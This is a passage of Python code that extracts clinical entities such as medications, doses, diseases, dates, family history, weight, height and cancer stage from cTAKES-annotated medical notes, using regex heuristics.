re.compile(r'\\bshe\\b',re.IGNORECASE),\n    re.compile(r'\\bher\\b',re.IGNORECASE),\n    re.compile(r'\\bms\\b',re.IGNORECASE),\n    re.compile(r'\\bmiss\\b',re.IGNORECASE),\n    re.compile(r'\\bmizz\\b',re.IGNORECASE),\n    re.compile(r'\\bhers\\b',re.IGNORECASE),\n    re.compile(r'\\bfemale\\b',re.IGNORECASE),\n    re.compile(r'\\bwoman\\b',re.IGNORECASE),\n    re.compile(r'\\blady\\b',re.IGNORECASE),\n    re.compile(r'\\bmadam\\b',re.IGNORECASE),\n    re.compile(r'\\bmadame\\b',re.IGNORECASE)\n    ]\n\n# smoking status regex\nSMOKING_REGEX = [\n    re.compile(r'\\bsmoke\\b',re.IGNORECASE),\n    re.compile(r'\\bsmokes\\b',re.IGNORECASE),\n    re.compile(r'\\bsmoked\\b',re.IGNORECASE),\n    re.compile(r'\\bsmoking\\b',re.IGNORECASE),\n    re.compile(r'\\bcigar\\b',re.IGNORECASE),\n    re.compile(r'\\bcigarettes\\b',re.IGNORECASE),\n    re.compile(r'\\bcigarette\\b',re.IGNORECASE),\n    re.compile(r'\\bcig\\b',re.IGNORECASE),\n    re.compile(r'\\bcigs\\b',re.IGNORECASE),\n    re.compile(r'\\bcigars\\b',re.IGNORECASE),\n    
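# hedged note: a single combined pattern such as re.compile(r'\\bcigarettes?\\b',re.IGNORECASE)\n    # would cover both the singular and plural spellings above in one entry\n    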
re.compile(r'\\btob\\b',re.IGNORECASE),\n    re.compile(r'\\btobacco\\b',re.IGNORECASE),\n    re.compile(r'\\btobaccos\\b',re.IGNORECASE),\n    re.compile(r'\\bnicotine\\b',re.IGNORECASE)\n    ]\n\n# drinking status regex\nDRINKING_REGEX = [\n    re.compile(r'\\bdrink\\b',re.IGNORECASE),\n    re.compile(r'\\bdrinks\\b',re.IGNORECASE),\n    re.compile(r'\\bdrinking\\b',re.IGNORECASE),\n    re.compile(r'\\bdrank\\b',re.IGNORECASE),\n    re.compile(r'\\bdrunk\\b',re.IGNORECASE),\n    re.compile(r'\\balcohol\\b',re.IGNORECASE),\n    re.compile(r'\\balcoholic\\b',re.IGNORECASE)\n    ]\n\n# exclude weird medications\nEXCLUDE_MEDICATION_REGEX = [\n    re.compile(r'^\\s*chicken\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*basis\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*today\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*his\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*program\\s*$',re.IGNORECASE),\n    re.compile(r'^\\s*active\\s*$',re.IGNORECASE)\n    ]\n# add more marker patterns\n# MARKER_REGEX = [\n#     re.compile(r'\\bcd[\\d]+\\b',re.IGNORECASE),\n#     re.compile(r'\\bzap-*[\\d]+\\b',re.IGNORECASE)\n#     ]\nMARKER_REGEX = [\n    re.compile(r'\\bcd[\\d]+[a-zA-Z]*[-%s]*[\\s.,;]',re.IGNORECASE),\n    re.compile(r'\\bzap-*[\\d]+[a-zA-Z]*[-%s]*[\\s.,;]',re.IGNORECASE)\n    ]\n\nMARKER_RESULT_REGEX = [\n    re.compile(r'\\bpositive\\b',re.IGNORECASE),\n    re.compile(r'\\bnegative\\b',re.IGNORECASE)\n    ]\n\n# TODO: populate family member regex lists and plurals\nFAMILY_REGEX = [\n    re.compile(r'\\bbrothers*',re.IGNORECASE),\n    re.compile(r'\\bsisters*', re.IGNORECASE),\n    re.compile(r'\\bfather\\b', re.IGNORECASE),\n    re.compile(r'\\bmother\\b', re.IGNORECASE),\n    re.compile(r'\\bsons*\\b', re.IGNORECASE),\n    re.compile(r'\\bdaughters*\\b', re.IGNORECASE),\n    re.compile(r'\\bchildren\\b', re.IGNORECASE),\n    re.compile(r'\\bchild\\b', re.IGNORECASE),\n    re.compile(r'\\bnephew\\b', re.IGNORECASE),\n    re.compile(r'\\bgrandfathers*\\b', re.IGNORECASE),\n    re.compile(r'\\bgrandmothers*\\b', re.IGNORECASE)\n    ]\n\n# weigh, weighs, weighed and weighing are all included\nWEIGHT_REGEX = [\n    re.compile(r'\\bweigh',re.IGNORECASE)\n    ]\n\nWEIGHT_UNIT_REGEX = [\n    re.compile(r'\\bkg\\b',re.IGNORECASE),\n    re.compile(r'\\bpound\\b', re.IGNORECASE),\n    re.compile(r'\\bpounds\\b', re.IGNORECASE),\n    re.compile(r'\\blb\\b', re.IGNORECASE),\n    re.compile(r'\\blbs\\b', re.IGNORECASE)\n    ]\n\nHEIGHT_REGEX = [\n    re.compile(r'\\bheight\\b',re.IGNORECASE),\n    re.compile(r'\\btall\\b', re.IGNORECASE)\n    ]\n\nHEIGHT_UNIT_REGEX = [\n    re.compile(r'\\bcm\\b',re.IGNORECASE),\n    re.compile(r'\\bm\\b', re.IGNORECASE),\n    re.compile(r'\\bfeet\\b', re.IGNORECASE),\n    re.compile(r'\\bft\\b', re.IGNORECASE),\n    re.compile(r'\\bft.\\b', re.IGNORECASE),\n    re.compile(r'\\binches\\b', re.IGNORECASE)\n    ]\n\nMEASUREMENT_REGEX = [\n    re.compile(r'[-.\\d]+ \\bunits\\b',re.IGNORECASE),\n    re.compile(r'[-.\\d]+ \\btablets\\b', re.IGNORECASE),\n    re.compile(r'\\bsliding scale\\b', re.IGNORECASE),\n    re.compile(r'[-.\\d]+ \\btab\\b', re.IGNORECASE),\n    re.compile(r'[-.\\d]+ \\bmeq\\b', re.IGNORECASE)\n    ]\n\nPERCENT_REGEX = re.compile(r'[-.\\d]+\\s*%',re.IGNORECASE)\n\nMONTH_REGEX = [\n    re.compile(r'january',re.IGNORECASE),\n    re.compile(r'february', re.IGNORECASE),\n    re.compile(r'march', re.IGNORECASE),\n    re.compile(r'april', re.IGNORECASE),\n    re.compile(r'may', re.IGNORECASE),\n    re.compile(r'june', re.IGNORECASE),\n    re.compile(r'july', re.IGNORECASE),\n    re.compile(r'august', re.IGNORECASE),\n    re.compile(r'september', re.IGNORECASE),\n    re.compile(r'october', re.IGNORECASE),\n    re.compile(r'november', re.IGNORECASE),\n    re.compile(r'december', 
re.IGNORECASE),\n re.compile(r'\\bjan\\b',re.IGNORECASE),\n re.compile(r'\\bfeb\\b', re.IGNORECASE),\n re.compile(r'\\bmar\\b', re.IGNORECASE),\n re.compile(r'\\bapr\\b', re.IGNORECASE),\n re.compile(r'\\bmay\\b', re.IGNORECASE),\n re.compile(r'\\bjun\\b', re.IGNORECASE),\n re.compile(r'\\bjul\\b', re.IGNORECASE),\n re.compile(r'\\baug\\b', re.IGNORECASE),\n re.compile(r'\\bsep\\b', re.IGNORECASE),\n re.compile(r'\\boct\\b', re.IGNORECASE),\n re.compile(r'\\bnov\\b', re.IGNORECASE),\n re.compile(r'\\bdec\\b', re.IGNORECASE)\n ]\n\n# pick out all entities needed\n# TODO: romans contain weird mentions\ndef travelTrough(filename, textname):\n xml_file = open(filename, \"r\")\n textfile = open(textname, \"r\").read()\n\n # entities interested\n medications = []\n sentences = []\n measurements = []\n predicates = []\n diseases = []\n dates = []\n semantics = []\n numbers = []\n nps = []\n procedures = []\n romans = []\n\n # XML tags for the interested entities\n medication_tag = \"org.apache.ctakes.typesystem.type.textsem.MedicationMention\"\n measurement_tag = \"org.apache.ctakes.typesystem.type.textsem.MeasurementAnnotation\"\n sentence_tag = \"org.apache.ctakes.typesystem.type.textspan.Sentence\"\n predicate_tag = \"org.apache.ctakes.typesystem.type.textsem.Predicate\"\n disease_tag = \"org.apache.ctakes.typesystem.type.textsem.DiseaseDisorderMention\"\n semantic_tag = \"org.apache.ctakes.typesystem.type.textsem.SemanticArgument\"\n date_tag = \"org.apache.ctakes.typesystem.type.textsem.DateAnnotation\"\n number_tag = \"org.apache.ctakes.typesystem.type.syntax.NumToken\"\n np_tag = \"org.apache.ctakes.typesystem.type.syntax.NP\"\n procedure_tag = \"org.apache.ctakes.typesystem.type.textsem.ProcedureMention\"\n roman_tag = \"org.apache.ctakes.typesystem.type.textsem.RomanNumeralAnnotation\"\n\n for event, elem in ET.iterparse(xml_file, events=(\"start\",)):\n # populate the entities\n findEntity(medications, elem, textfile, medication_tag, \"medication\", \"by_position\")\n findEntity(measurements, elem, textfile, measurement_tag, \"measurement\", \"by_position\")\n findEntity(sentences, elem, textfile, sentence_tag, \"sentence\", \"by_position\")\n findEntity(predicates, elem, textfile, predicate_tag, \"predicate\", \"frameSet\")\n findEntity(diseases, elem, textfile, disease_tag, \"disease\", \"by_position\", \"polarity\")\n findEntity(semantics, elem, textfile, semantic_tag, \"semantic\", \"by_position\", \"label\")\n findEntity(dates, elem, textfile, date_tag, \"date\", \"by_position\")\n findEntity(numbers, elem, textfile, number_tag, \"number\", \"by_position\")\n findEntity(nps, elem, textfile, np_tag, \"np\", \"by_position\")\n findEntity(procedures, elem, textfile, procedure_tag, \"procedure\", \"by_position\")\n findEntity(romans, elem, textfile, roman_tag, \"roman\", \"by_position\")\n\n # find doses missed by cTakes\n findOtherMeasurements(textfile, measurements)\n\n # exclude weird disease recognitions by cTakes\n tmp_diseases = []\n for disease in diseases:\n if_exclude = False\n for r in EXCLUDE_DISEASE_REGEX:\n m = r.search(disease[\"content\"])\n if m != None:\n if_exclude = True\n break\n if not if_exclude: tmp_diseases.append(disease)\n diseases = tmp_diseases\n\n # exclude weird procedures recognitions by cTakes\n tmp_procedures = []\n for procedure in procedures:\n if_exclude = False\n for r in EXCLUDE_TREATMENT_REGEX:\n m = r.search(procedure[\"content\"])\n if m != None:\n if_exclude = True\n break\n if not if_exclude: tmp_procedures.append(procedure)\n procedures = 
tmp_procedures\n\n    # exclude weird medication recognitions by cTakes\n    tmp_medications = []\n    for medication in medications:\n        if_exclude = False\n        for r in EXCLUDE_MEDICATION_REGEX:\n            m = r.search(medication[\"content\"])\n            if m != None:\n                if_exclude = True\n                break\n        if not if_exclude: tmp_medications.append(medication)\n    medications = tmp_medications\n\n    xml_file.close()\n    return medications, sentences, measurements, predicates, diseases, semantics, dates, numbers, nps, procedures, romans\n\n# find a specific type of entities\n# *otherAttributes are information other than beg, end, content and type\n# argument list:\n# entities: list of entities to populate\n# elem: the XML element\n# textfile: the original text file\n# entity_tag: the XML tag for the interested entities\n# type: the attribute specifying the type of the entity\n# contentTag: the content information for the entity\n# if contentTag is \"by_position\", use the string bounded by begin and end positions\n# if contentTag is \"ATTRIBUTE_NAME\", use the corresponding attribute value of the XML element\n# *otherAttributes: (optional) other attribute values of the XML element needed\ndef findEntity(entities, elem, textfile, entity_tag, type, contentTag, *otherAttributes):\n    attrb_list = [attr for attr in otherAttributes]\n\n    if elem.tag == entity_tag:\n        item = {}\n        beg = int(elem.attrib[\"begin\"])\n        end = int(elem.attrib[\"end\"])\n\n        if contentTag == \"by_position\":\n            content = textfile[int(elem.attrib[\"begin\"]):int(elem.attrib[\"end\"])]\n        else:\n            content = elem.attrib[contentTag]\n        item[\"beg\"] = beg\n        item[\"end\"] = end\n        item[\"content\"] = content\n        item[\"type\"] = type\n\n        for attrb in attrb_list:\n            item[attrb] = elem.attrib[attrb]\n\n        entities.append(item)\n\ndef determineGender(text):\n    male_vote = 0\n    female_vote = 0\n\n    # count male related mentions\n    for r in MALE_REGEX:\n        all = r.findall(text)\n        male_vote += len(all)\n\n    # count female related mentions\n    for r in FEMALE_REGEX:\n        all = r.findall(text)\n        female_vote += len(all)\n\n    if male_vote > female_vote:\n        return \"male\"\n    elif male_vote < female_vote:\n        return \"female\"\n    else:\n        return \"Undetermined\"\n\n\n# find marker mentions\ndef findMarkers(text, sentences):\n    markers = {}\n\n    for r in MARKER_REGEX:\n        iters = r.finditer(text)\n        for it in iters:\n            beg = it.span()[0]\n            end = it.span()[1]\n            sen_id = findSentenceNumber(beg, end, sentences)\n\n            item = {}\n            item[\"beg\"] = beg\n            item[\"end\"] = end\n            item[\"type\"] = \"marker\"\n            item[\"content\"] = it.group().strip().strip(\".,;\")\n            item[\"sen_id\"] = sen_id\n\n            markers[beg] = item\n\n    return markers\n\n# find marker results\ndef findMarkerResults(text, sentences):\n    results = {}\n\n    for r in MARKER_RESULT_REGEX:\n        iters = r.finditer(text)\n        for it in iters:\n            beg = it.span()[0]\n            end = it.span()[1]\n            sen_id = findSentenceNumber(beg, end, sentences)\n\n            item = {}\n            item[\"beg\"] = beg\n            item[\"end\"] = end\n            item[\"type\"] = \"marker result\"\n            item[\"content\"] = it.group()\n            item[\"sen_id\"] = sen_id\n\n            results[beg] = item\n\n    return results\n\n# find other measurements not recognized by cTakes, such as \"1 tab\", \"1 tablet\"\n# the list of regexes for such measurements is given in the global MEASUREMENT_REGEX\ndef findOtherMeasurements(text, measurements):\n    for r in MEASUREMENT_REGEX:\n        iters = r.finditer(text)\n        for iter in iters:\n            item = {}\n            item[\"beg\"] = iter.span()[0]\n            item[\"end\"] = iter.span()[1]\n            item[\"content\"] = iter.group()\n            item[\"type\"] = \"measurement\"\n            
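# illustrative example (hypothetical offsets): for the text \"take 2 tablets daily\" the\n            # tablets pattern yields {\"beg\": 5, \"end\": 14, \"content\": \"2 tablets\", \"type\": \"measurement\"}\n            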
measurements.append(item)\n\n# find other dates not recognized by cTakes, such as \"December, 21 2009\"\ndef findOtherDates(text, dates, numbers, sentences):\n    for r in MONTH_REGEX:\n        # find if there is any month mentioned in the whole text\n        iters = r.finditer(text)\n        for iter in iters:\n            if iter.span()[0] not in dates:\n                month = text[iter.span()[0] : iter.span()[1]]\n                month_sen_id = findSentenceNumber(iter.span()[0], iter.span()[1], sentences)\n                date_end_position = iter.span()[1]\n                # find the year of the date\n                nums = []\n                for num_key in numbers:\n                    num_sen_id = numbers[num_key][\"sen_id\"]\n\n                    # TODO: take care of two digits year\n                    # TODO: take care of year before month\n                    # TODO: take care of year only\n                    num_beg = numbers[num_key][\"beg\"]\n                    num_end = numbers[num_key][\"end\"]\n                    num_len = num_end - num_beg\n                    if num_sen_id == month_sen_id and num_len == 4:\n                        if num_beg >= iter.span()[1]: nums.append(num_key)\n\n                if len(nums) != 0:\n                    date_end_position = numbers[nums[0]][\"end\"]\n\n                # append the date item\n                item = {}\n                beg = iter.span()[0]\n                end = date_end_position  # falls back to the month's end when no year was found\n                content = text[beg : end]\n                sen_id = month_sen_id\n\n                item[\"beg\"] = beg\n                item[\"end\"] = end\n                item[\"content\"] = content\n                item[\"type\"] = \"date\"\n                item[\"sen_id\"] = sen_id\n\n                dates[beg] = item\n\n# find percentages\ndef findPercentage(text, sentences):\n    percentages = {}\n    iters = PERCENT_REGEX.finditer(text)\n    for it in iters:\n        item = {}\n        item[\"beg\"] = it.span()[0]\n        item[\"end\"] = it.span()[1]\n        item[\"content\"] = it.group()\n        item[\"type\"] = \"percentage\"\n        item[\"sen_id\"] = findSentenceNumber(item[\"beg\"], item[\"end\"], sentences)\n        percentages[item[\"beg\"]] = item\n\n    return percentages\n\n\n# TODO: Make sure sentences are in correct order\ndef addSentenceNumber_new(sentences, entities, *args):\n    list_of_entities = [entities]\n    for arg in args:\n        list_of_entities.append(arg)\n    for ents in list_of_entities:\n        for entity in ents:\n            for sen_ind, sentence in enumerate(sentences):\n                if entity[\"beg\"] >= sentence[\"beg\"] and entity[\"end\"] <= sentence[\"end\"]:\n                    entity[\"sen_id\"] = sen_ind\n\n# TODO: Make sure sentences are in correct order\ndef findSentenceNumber(beg, end, sentences):\n    ind = -1\n    for sen_ind, sentence in enumerate(sentences):\n        if beg >= sentence[\"beg\"] and end <= sentence[\"end\"]:\n            ind = sen_ind\n            break\n    return ind\n\n# combine the entities input to the function into a dictionary\n# the key is the beginning position\ndef indexEntities(entities, *args):\n    ret_entities = {}\n    original_entities = [entities]\n\n    for arg in args: original_entities.append(arg)\n\n    for ents in original_entities:\n        for entity in ents:\n            ret_entities[entity[\"beg\"]] = entity\n\n    return ret_entities\n\n# combine entities that have been indexed with beg position\ndef combineIndexedEntities(entities_1, entities_2):\n    combined = {}\n    for key in entities_1:\n        combined[key] = entities_1[key]\n    for key in entities_2:\n        combined[key] = entities_2[key]\n    return combined\n\n# TODO: clean the code for this function!\ndef catEntities(combinedentities, txtfname):\n    textfile = open(txtfname, \"r\").read()\n\n    newentities = {}\n    entity_keys = list(combinedentities.keys())\n    entity_keys.sort()\n    sz = len(entity_keys)\n\n    # determine if there is a need to close the parentheses\n    need_to_close = False\n    # determine if the two are the same\n    previous_same = False\n    previous_ind = 0\n    # keep track of the position covered\n    covered_position = 0\n\n    for i in range(sz):\n        cur_type = 
combinedentities[entity_keys[i]][\"type\"]\n        cur_beg = combinedentities[entity_keys[i]][\"beg\"]\n        cur_end = combinedentities[entity_keys[i]][\"end\"]\n\n\n        if i < sz - 1:\n            next_type = combinedentities[entity_keys[i + 1]][\"type\"]\n            next_beg = combinedentities[entity_keys[i + 1]][\"beg\"]\n            next_end = combinedentities[entity_keys[i + 1]][\"end\"]\n            if cur_type == \"medication\" and next_type == \"medication\" and (next_beg - cur_end) < 4:\n\n                # regex for determining if two adjacent medications are the same\n                separated_medication = re.compile(r'[^ (]',re.IGNORECASE)\n                m = separated_medication.search(textfile[cur_end : next_beg])\n\n                # regex for determining if there is a left parenthesis between two medications\n                contains_left_parentheses = re.compile(r'\\(')\n                m1 = contains_left_parentheses.search(textfile[cur_end : next_beg])\n\n                contains_right_parentheses = re.compile(r'\\)')\n\n                # if the same medications, combine them\n                if m == None:\n                    # if the previous two are also the same, no need to create a new entry in newentities\n                    # only do the combining\n                    if previous_same:\n                        # for closing parentheses\n                        if m1 != None:\n                            m2 = contains_right_parentheses.search(textfile[newentities[previous_ind]['beg'] : ])\n                            end = m2.start() + newentities[previous_ind]['beg'] + 1\n                        else:\n                            m3 = contains_left_parentheses.search(textfile[cur_end : ])\n                            m4 = contains_right_parentheses.search(textfile[cur_end : ])\n                            if (m3 == None and m4 != None) or (m3 != None and m4 != None and m3.start() > m4.start()):\n                                end = m4.start() + cur_end + 1\n                            else:\n                                end = next_end\n\n                        newentities[previous_ind]['content'] = textfile[newentities[previous_ind]['beg'] : end]\n                        newentities[previous_ind]['end'] = end\n                        covered_position = end\n\n                    else:\n                        # for closing parentheses\n                        if m1 != None:\n                            m2 = contains_right_parentheses.search(textfile[cur_beg : ])\n                            end = m2.start() + cur_beg + 1\n                        else:\n                            end = next_end\n\n                        newentities[cur_beg] = combinedentities[cur_beg]\n                        newentities[cur_beg]['content'] = textfile[cur_beg : end]\n                        newentities[cur_beg]['end'] = end\n                        previous_same = True\n                        previous_ind = cur_beg\n                        covered_position = end\n\n                # if not the same, add the entity to newentities, set previous_same to False\n                else:\n                    if cur_beg >= covered_position:\n                        newentities[cur_beg] = combinedentities[cur_beg]\n                        covered_position = cur_end\n                    previous_same = False\n            else:\n                if cur_beg >= covered_position:\n                    newentities[cur_beg] = combinedentities[cur_beg]\n                    covered_position = cur_end\n                previous_same = False\n        elif cur_beg >= covered_position and not previous_same:\n            newentities[cur_beg] = combinedentities[cur_beg]\n\n    return newentities\n\n# find headlines such as \"IDENTIFICATION:\"\ndef findHeads(sentences, text):\n    heads = {}\n    tmp_heads = []\n    for id, sentence in enumerate(sentences):\n        previous_char = text[sentence[\"beg\"] - 1 : sentence[\"beg\"]]\n        last_char = text[sentence[\"end\"] - 1 : sentence[\"end\"]]\n        if (sentence[\"beg\"] == 0 or previous_char == '\\n') and last_char == ':':\n            tmp_heads.append([sentence[\"content\"].strip(\":\").lower(), sentence[\"beg\"]])\n\n    for i, head in enumerate(tmp_heads):\n        heads[head[0]] = [head[1], len(text) if i == len(tmp_heads) - 1 else tmp_heads[i + 1][1]]\n\n    return heads\n\n# picks only entities within a certain section\ndef getEntitiesInSection(entities, heads={}, section=\"\"):\n    entities_in = {}\n\n    if bool(heads) and section != \"\":\n        section_beg = heads[section][0]\n        section_end = heads[section][1]\n\n        for key in entities:\n            entity_beg = entities[key][\"beg\"]\n            entity_end = entities[key][\"end\"]\n            if entity_beg >= section_beg and entity_end <= section_end:\n                entities_in[key] = entities[key]\n    else:\n        entities_in = entities.copy()\n\n    return entities_in\n\n# loop through all the noun phrases to find family member mentions\ndef findRelatives(nps, textfile, heads={}, section=\"\"):\n    nps_in = getEntitiesInSection(nps, heads=heads, section=section)\n\n    relatives = {}\n    for key in nps_in:\n        np_beg = nps_in[key][\"beg\"]\n        np_end = nps_in[key][\"end\"]\n        for r in FAMILY_REGEX:\n            m = r.search(nps_in[key][\"content\"])\n            if m != None:\n                item = nps_in[key]\n                item[\"beg\"] = m.span()[0] + np_beg\n                item[\"end\"] = m.span()[1] + np_beg\n                item[\"content\"] = m.group(0)\n                item[\"type\"] = \"relative\"\n                relatives[item[\"beg\"]] = item\n    return relatives\n\n# find any two types of entities: primary and secondary.\n# all primary entities will be matched, adding \"Unknown\" if no secondary entities can be matched with.\ndef findmatch(combinedentities, sentence_threshold, primary, secondary):\n    already_picked = set()\n    matches = {}\n    entity_keys = list(combinedentities.keys())\n    entity_keys.sort()\n    sz = len(entity_keys)\n\n    for i in range(sz):\n        ind = entity_keys[i]\n        type = combinedentities[ind][\"type\"]\n        sen_id = combinedentities[ind][\"sen_id\"]\n\n        if type == primary:\n\n            already_picked.add(ind)\n            if i < sz - 1:\n                next_ind = entity_keys[i + 1]\n                next_type = combinedentities[next_ind][\"type\"]\n                next_sen_id = combinedentities[next_ind][\"sen_id\"]\n                if next_type == secondary and (next_sen_id - sen_id) <= sentence_threshold:\n                    matches[ind] = next_ind\n                    already_picked.add(next_ind)\n                elif i > 0:\n                    prev_ind = entity_keys[i - 1]\n                    prev_type = combinedentities[prev_ind][\"type\"]\n                    prev_sen_id = combinedentities[prev_ind][\"sen_id\"]\n                    if (not (prev_ind in already_picked)) and prev_type == secondary and (sen_id - prev_sen_id) <= sentence_threshold:\n                        matches[ind] = prev_ind\n                        already_picked.add(prev_ind)\n                    else: matches[ind] = -1\n                else:\n                    matches[ind] = -1\n            else:\n                prev_ind = entity_keys[i - 1]\n                prev_type = combinedentities[prev_ind][\"type\"]\n                prev_sen_id = combinedentities[prev_ind][\"sen_id\"]\n                if (not (prev_ind in already_picked)) and prev_type == secondary and (sen_id - prev_sen_id) <= sentence_threshold:\n                    matches[ind] = prev_ind\n                    already_picked.add(prev_ind)\n                else: matches[ind] = -1\n\n    return matches\n\ndef matchDiagnose(diseases, dates, semantics, predicates, text, heads={}, section=\"\"):\n    diseases_in = getEntitiesInSection(diseases, heads=heads, section=section)\n    dates_in = getEntitiesInSection(dates, heads=heads, section=section)\n\n    # TODO: implement more sophisticated negation rules\n    # TODO: more sophisticated match\n    combined = combineIndexedEntities(diseases_in, dates_in)\n\n    diagnoses_match = findmatch(combined, 1, \"disease\",\"date\")\n    match_output = []\n    for key in diagnoses_match:\n        diag_item = {}\n        diag_item[\"disease\"] = diseases_in[key][\"content\"]\n        diag_item[\"diagnosed\"] = \"No\" if diseases_in[key][\"polarity\"] == \"-1\" else \"Yes\"\n        diag_item[\"date\"] = \"Unknown\" if diagnoses_match[key] not in dates_in else dates_in[diagnoses_match[key]][\"content\"]\n        match_output.append(diag_item)\n\n    return match_output\n\n# TODO: refactor this and matchDiagnose\n# TODO: amox/clav is partially recognized as amox\ndef matchMedication(medication_and_measurement, text, heads={}, section=\"\"):\n    entities_in = getEntitiesInSection(medication_and_measurement, heads=heads, section=section)\n\n    medication_match = findmatch(entities_in, 1, \"medication\",\"measurement\")\n    match_output = []\n    for key in medication_match:\n        item = {}\n        item[\"medication\"] = entities_in[key][\"content\"]\n        item[\"dose\"] = \"Unknown\" if medication_match[key] not in entities_in else entities_in[medication_match[key]][\"content\"]\n        match_output.append(item)\n\n    return match_output\n\n# match percentages with the correct marker mentions (marker name + positive/negative + percentage)\ndef matchPercentage(percentages, markers, results, heads={}, section=\"\"):\n    markers_in = getEntitiesInSection(markers, heads=heads, section=section)\n    results_in = getEntitiesInSection(results, heads=heads, section=section)\n    percentages_in = getEntitiesInSection(percentages, heads=heads, section=section)\n\n    percentages_and_results = combineIndexedEntities(percentages_in, results_in)\n    per_re_match = findmatch(percentages_and_results, 1, \"percentage\", \"marker result\")\n\n    for key in per_re_match:\n        if per_re_match[key] != -1:\n            results_in[per_re_match[key]][\"content\"] = percentages_in[key][\"content\"] + \" \" + results_in[per_re_match[key]][\"content\"]\n\n    # TODO: more strict relation matches\n    combined = combineIndexedEntities(markers_in, results_in)\n    matches = findmatch(combined, 1, \"marker\", \"marker result\")\n\n    match_output = []\n    keys = [k for k in matches]\n    keys.sort()\n    for key in keys:\n        item = {}\n        item[\"marker\"] = combined[key][\"content\"]\n        item[\"result\"] = \"Unknown\" if matches[key] == -1 else combined[matches[key]][\"content\"]\n        match_output.append(item)\n\n    return match_output\n\n# TODO: miss oral fludarabine therapy. fludarabine is a medication mention and therapy is a procedure mention.\ndef matchProcedure(procedure_and_date, text, heads={}, section=\"\"):\n    entities_in = getEntitiesInSection(procedure_and_date, heads=heads, section=section)\n\n    procedure_match = findmatch(entities_in, 1, \"procedure\",\"date\")\n    match_output = []\n    for key in procedure_match:\n        item = {}\n        item[\"procedure\"] = entities_in[key][\"content\"]\n        item[\"date\"] = \"Unknown\" if procedure_match[key] not in entities_in else entities_in[procedure_match[key]][\"content\"]\n        match_output.append(item)\n\n    return match_output\n\n# TODO: refactor this and matchDiagnose\n# TODO: details for how many members when plural\n# TODO: More complicated negations\ndef matchFamilyHistory(relatives, diseases, textfile, heads={}, section=\"\"):\n    diseases_in = getEntitiesInSection(diseases, heads=heads, section=section)\n    relatives_in = getEntitiesInSection(relatives, heads=heads, section=section)\n\n    combined = combineIndexedEntities(relatives_in, diseases_in)\n\n    history_match = findmatch(combined, 1, \"relative\",\"disease\")\n\n    match_output = []\n    for key in history_match:\n        if history_match[key] in diseases_in:\n            item = {}\n            item[\"member\"] = relatives_in[key][\"content\"]\n            item[\"disease\"] = diseases_in[history_match[key]][\"content\"]\n\n            # TODO: negations\n            negation = re.compile(r'\\bnot*\\b')\n\n            negation_beg = min(relatives_in[key][\"beg\"], diseases_in[history_match[key]][\"beg\"])\n            negation_end = max(relatives_in[key][\"end\"], diseases_in[history_match[key]][\"end\"])\n            str = textfile[negation_beg : negation_end]\n            m = negation.search(str)\n            item[\"negative\"] = \"Yes\" if m != None else \"No\"\n\n            match_output.append(item)\n\n    return match_output\n\n# TODO: Current and admit weight. Which one to include?\n# TODO: If no section headings?\ndef matchWeight(sentences, measurements, text, heads={}, section=\"\"):\n    possible_weights = {}\n\n    if bool(heads) and section != \"\":\n        section_beg = heads[section][0]\n        section_end = heads[section][1]\n    else:\n        section_beg = 0\n        section_end = len(text)\n\n    for key in measurements:\n        measure = measurements[key]\n        mea_beg = measure[\"beg\"]\n        mea_end = measure[\"end\"]\n        is_weight = False\n        for r in WEIGHT_UNIT_REGEX:\n            m = r.search(measure[\"content\"])\n            if m != None:\n                is_weight = True\n                break\n        # TODO: if the sentence also has words like weigh or weighs, etc.\n        if is_weight and mea_beg >= section_beg and mea_end <= section_end: possible_weights[key] = measure\n\n    weights = []\n    for key in possible_weights:\n        weights.append(possible_weights[key])\n    return weights\n\ndef matchHeight(sentences, measurements, text, heads={}, section=\"\"):\n    possible_heights = {}\n\n    if bool(heads) and section != \"\":\n        section_beg = heads[section][0]\n        section_end = heads[section][1]\n    else:\n        section_beg = 0\n        section_end = len(text)\n\n    for key in measurements:\n        measure = measurements[key]\n        mea_beg = measure[\"beg\"]\n        mea_end = measure[\"end\"]\n        is_height = False\n        for r in HEIGHT_UNIT_REGEX:\n            m = r.search(measure[\"content\"])\n            if m != None:\n                is_height = True\n                break\n\n        if is_height and mea_beg >= section_beg and mea_end <= section_end: possible_heights[key] = measure\n\n    heights = []\n    for key in possible_heights:\n        sen_id = findSentenceNumber(possible_heights[key][\"beg\"], possible_heights[key][\"end\"], sentences)\n        sentence = sentences[sen_id][\"content\"]\n\n        # TODO: if height and non-height measurements are in the same sentence?\n        for r in HEIGHT_REGEX:\n            m = r.search(sentence)\n            if m != None: heights.append(possible_heights[key])\n    return heights\n\n# match markers with results\ndef matchMarkers(markers, results, heads={}, section=\"\"):\n    markers_in = getEntitiesInSection(markers, heads=heads, section=section)\n    results_in = getEntitiesInSection(results, heads=heads, section=section)\n\n    combined = combineIndexedEntities(markers_in, results_in)\n    matches = findmatch(combined, 1, \"marker\", \"marker result\")\n\n    match_output = []\n    keys = [k for k in matches]\n    keys.sort()\n    for key in keys:\n        item = {}\n        item[\"marker\"] = combined[key][\"content\"]\n        item[\"result\"] = \"Unknown\" if matches[key] == -1 else combined[matches[key]][\"content\"]\n        match_output.append(item)\n\n    return match_output\n\n# TODO: find stage information through NP's. 
This should simplify the code.\ndef findStages(nps, romans, sentences, text):\n    textfile = open(text, \"r\").read()\n\n    stage_regex = [\n        re.compile(r'\\bstage\\b',re.IGNORECASE),\n        re.compile(r'\\brai stage\\b',re.IGNORECASE)\n        ]\n\n    stages = {}\n    for r in stage_regex:\n        iters = r.finditer(textfile)\n        for it in iters:\n            item = {}\n            item[\"beg\"] = it.span()[0]\n            item[\"end\"] = it.span()[1]\n            item[\"type\"] = \"stage\"\n            item[\"content\"] = it.group()\n            item[\"sen_id\"] = findSentenceNumber(item[\"beg\"], item[\"end\"], sentences)\n            stages[item[\"beg\"]] = item\n\n    stages = catEntities(stages, text)\n\n    stage_roman = combineIndexedEntities(stages, romans)\n    matches = findmatch(stage_roman, 1, \"stage\", \"roman\")\n\n    match_output = []\n    keys = [k for k in matches]\n    keys.sort()\n    for key in keys:\n        item = {}\n        item[\"stage\"] = stage_roman[key][\"content\"]\n        item[\"stage number\"] = \"Unknown\" if matches[key] == -1 else stage_roman[matches[key]][\"content\"]\n        match_output.append(item)\n\n    return match_output\n\n# TODO: find consistent data format for diagnoses/diseases, stages and fish, maybe markers\n# TODO: merge fish with other marker tests\ndef 